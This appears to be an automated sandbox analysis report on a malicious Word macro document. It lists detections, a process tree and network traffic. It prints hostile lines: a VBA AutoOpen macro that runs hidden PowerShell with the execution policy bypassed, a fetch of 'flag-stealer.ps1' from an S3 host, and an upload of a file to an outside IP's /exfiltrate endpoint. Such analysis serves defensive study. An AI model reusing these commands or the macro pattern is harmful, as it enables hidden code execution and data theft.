Edit tour

Windows Analysis Report
mal_temp.dotm.doc

Overview

General Information

Sample name:	mal_temp.dotm.doc
Analysis ID:	1632753
MD5:	65a18dada289696e52a38b04ca7f8c8d
SHA1:	bd4a547e5b32f063581003b5d6d83113fe302f3b
SHA256:	79e73d7d1c51b238c9d123afea7707cb1aa339cbb6d42fd7b4dd84813419c0cb
Tags:	docuser-skocherhan
Infos:

Detection

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Office product drops script at suspicious location

Bypasses PowerShell execution policy

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Document exploit detected (process start blacklist hit)

Microsoft Office drops suspicious files

Office process queries suspicious COM object (likely to drop second stage)

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Uses known network protocols on non-standard ports

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Suspicious Office Outbound Connections

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 7564 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)

powershell.exe (PID: 7420 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\upload_script.ps1" "C:\Users\user\AppData\Local\Temp\flag.txt" "http://18.157.68.73:11858/exfiltrate" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

System Summary

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7564, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", ProcessId: 7420, ProcessName: powershell.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7564, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", ProcessId: 7420, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7564, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", ProcessId: 7420, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7564, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", ProcessId: 7420, ProcessName: powershell.exe

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49717, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7564, Protocol: tcp, SourceIp: 52.219.171.190, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7564, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1", ProcessId: 7420, ProcessName: powershell.exe

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7420, TargetFilename: C:\Users\user\AppData\Local\Temp\upload_script.ps1

Data Obfuscation

Sigma detected: Office product drops script at suspicious location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 7564, TargetFilename: C:\Users\user\AppData\Local\Temp\downloaded_script.ps1

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

• AV Detection
• Compliance
• Spreading
• Software Vulnerabilities
• Networking
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: mal_temp.dotm.doc

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\~WRD0000.tmp

Avira: detection malicious, Label: HEUR/Macro.Downloader.YPA.Gen

Multi AV Scanner detection for submitted file

Source: mal_temp.dotm.doc	Virustotal: Detection: 56%			Perma Link
Source: mal_temp.dotm.doc	ReversingLabs: Detection: 47%

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 52.219.171.190:443 -> 192.168.2.4:49717 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5; source: powershell.exe, 0000000F.00000002.2598670891.0000000003218000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 0000000F.00000002.2613605335.00000000085FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb_ source: powershell.exe, 0000000F.00000002.2613605335.00000000085FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb, source: powershell.exe, 0000000F.00000002.2598670891.00000000032B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2609359619.0000000007747000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 0000000F.00000002.2613605335.00000000085FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000F.00000002.2598670891.000000000327A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lambda_methodCore.pdb source: powershell.exe, 0000000F.00000002.2598670891.00000000032B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HPVo,C:\Windows\System.pdb source: powershell.exe, 0000000F.00000002.2613095120.00000000084C7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000F.00000002.2609359619.0000000007714000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2609359619.0000000007747000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbr source: powershell.exe, 0000000F.00000002.2613605335.00000000085FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb-2246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32ll source: powershell.exe, 0000000F.00000002.2598670891.0000000003218000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 0000000F.00000002.2598670891.00000000032B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000F.00000002.2598670891.0000000003218000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2598670891.00000000032B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbZG source: powershell.exe, 0000000F.00000002.2598670891.00000000032B8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic

DNS query: name: free-games-ua.s3.eu-central-1.amazonaws.com

Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443

Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 52.219.171.190:443 -> 192.168.2.4:49717
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 52.219.171.190:443 -> 192.168.2.4:49717
Source: global traffic	TCP traffic: 52.219.171.190:443 -> 192.168.2.4:49717
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 52.219.171.190:443 -> 192.168.2.4:49717
Source: global traffic	TCP traffic: 52.219.171.190:443 -> 192.168.2.4:49717
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 52.219.171.190:443 -> 192.168.2.4:49717
Source: global traffic	TCP traffic: 52.219.171.190:443 -> 192.168.2.4:49717
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 52.219.171.190:443 -> 192.168.2.4:49717
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 52.219.171.190:443 -> 192.168.2.4:49717
Source: global traffic	TCP traffic: 52.219.171.190:443 -> 192.168.2.4:49717
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 192.168.2.4:49717 -> 52.219.171.190:443
Source: global traffic	TCP traffic: 52.219.171.190:443 -> 192.168.2.4:49717
Source: global traffic	TCP traffic: 192.168.2.4:49727 -> 18.157.68.73:11858
Source: global traffic	TCP traffic: 18.157.68.73:11858 -> 192.168.2.4:49727
Source: global traffic	TCP traffic: 192.168.2.4:49727 -> 18.157.68.73:11858
Source: global traffic	TCP traffic: 192.168.2.4:49727 -> 18.157.68.73:11858
Source: global traffic	TCP traffic: 18.157.68.73:11858 -> 192.168.2.4:49727
Source: global traffic	TCP traffic: 192.168.2.4:49727 -> 18.157.68.73:11858
Source: global traffic	TCP traffic: 18.157.68.73:11858 -> 192.168.2.4:49727
Source: global traffic	TCP traffic: 192.168.2.4:49494 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.4:49494
Source: global traffic	TCP traffic: 192.168.2.4:49494 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.4:49494
Source: global traffic	TCP traffic: 192.168.2.4:49494 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.4:49494
Source: global traffic	TCP traffic: 192.168.2.4:49494 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 18.157.68.73:11858 -> 192.168.2.4:49727
Source: global traffic	TCP traffic: 192.168.2.4:49727 -> 18.157.68.73:11858
Source: global traffic	TCP traffic: 192.168.2.4:49727 -> 18.157.68.73:11858
Source: global traffic	TCP traffic: 18.157.68.73:11858 -> 192.168.2.4:49727
Source: global traffic	TCP traffic: 192.168.2.4:49498 -> 18.157.68.73:11858
Source: global traffic	TCP traffic: 18.157.68.73:11858 -> 192.168.2.4:49498
Source: global traffic	TCP traffic: 192.168.2.4:49498 -> 18.157.68.73:11858
Source: global traffic	TCP traffic: 192.168.2.4:49498 -> 18.157.68.73:11858
Source: global traffic	TCP traffic: 18.157.68.73:11858 -> 192.168.2.4:49498
Source: global traffic	TCP traffic: 192.168.2.4:49498 -> 18.157.68.73:11858
Source: global traffic	TCP traffic: 18.157.68.73:11858 -> 192.168.2.4:49498

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 11858
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 11858

Source: global traffic

TCP traffic: 192.168.2.4:49727 -> 18.157.68.73:11858

Source: global traffic

TCP traffic: 192.168.2.4:49494 -> 1.1.1.1:53

Source: Joe Sandbox View

IP Address: 18.157.68.73 18.157.68.73

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: global traffic	HTTP traffic detected: GET /flag-stealer.ps1 HTTP/1.1Accept: /Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: free-games-ua.s3.eu-central-1.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /exfiltrate HTTP/1.1Content-Type: text/plainUser-Agent: Mozilla/5.0Host: 18.157.68.73:11858Content-Length: 12Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /exfiltrate HTTP/1.1Content-Type: text/plainUser-Agent: Mozilla/5.0Host: 18.157.68.73:11858Content-Length: 12Expect: 100-continueConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 18.157.68.73
Source: unknown	TCP traffic detected without corresponding DNS query: 18.157.68.73
Source: unknown	TCP traffic detected without corresponding DNS query: 18.157.68.73
Source: unknown	TCP traffic detected without corresponding DNS query: 18.157.68.73
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 18.157.68.73
Source: unknown	TCP traffic detected without corresponding DNS query: 18.157.68.73
Source: unknown	TCP traffic detected without corresponding DNS query: 18.157.68.73
Source: unknown	TCP traffic detected without corresponding DNS query: 18.157.68.73
Source: unknown	TCP traffic detected without corresponding DNS query: 18.157.68.73
Source: unknown	TCP traffic detected without corresponding DNS query: 18.157.68.73
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /flag-stealer.ps1 HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: free-games-ua.s3.eu-central-1.amazonaws.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: free-games-ua.s3.eu-central-1.amazonaws.com

Source: unknown

HTTP traffic detected: POST /exfiltrate HTTP/1.1Content-Type: text/plainUser-Agent: Mozilla/5.0Host: 18.157.68.73:11858Content-Length: 12Expect: 100-continueConnection: Keep-Alive

Source: vbaProject.bin	String found in binary or memory: http://127.0.0.1:8000/download/ps1
Source: powershell.exe, 0000000F.00000002.2600077843.00000000058CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2600077843.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://18.157.68.73:11858
Source: powershell.exe, 0000000F.00000002.2609359619.00000000076D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2609359619.0000000007747000.00000004.00000020.00020000.00000000.sdmp, downloaded_script.ps1.0.dr	String found in binary or memory: http://18.157.68.73:11858/exfiltrate
Source: powershell.exe, 0000000F.00000002.2598670891.0000000003218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.157.68.73:11858/exfiltrate&
Source: powershell.exe, 0000000F.00000002.2598670891.0000000003218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.157.68.73:11858/exfiltrate)3D6
Source: powershell.exe, 0000000F.00000002.2598670891.0000000003218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.157.68.73:11858/exfiltrateK2b7
Source: powershell.exe, 0000000F.00000002.2598009249.0000000003180000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.157.68.73:11858/exfiltratel
Source: powershell.exe, 0000000F.00000002.2609359619.0000000007747000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000000C.00000002.1335282288.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2607566318.00000000062D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.2600077843.00000000053B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.1332259932.0000000004781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2600077843.0000000005261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.2600077843.00000000053B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.1332259932.0000000004781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2600077843.0000000005261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000F.00000002.2607566318.00000000062D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.2607566318.00000000062D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.2607566318.00000000062D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: vbaProject.bin	String found in binary or memory: https://free-games-ua.s3.eu-central-1.amazonaws.com/flag-stealer.ps1
Source: powershell.exe, 0000000F.00000002.2600077843.00000000053B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.2600077843.000000000590B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000C.00000002.1335282288.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2607566318.00000000062D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443

Source: unknown

HTTPS traffic detected: 52.219.171.190:443 -> 192.168.2.4:49717 version: TLS 1.2

System Summary

Document contains an embedded VBA macro which may execute processes

Source: mal_temp.dotm.doc	OLE, VBA macro line: objShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File """ & strFilePath & """", 0, False
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, API IWshShell3.Run("powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1"",0:Integer,False)	Name: AutoOpen
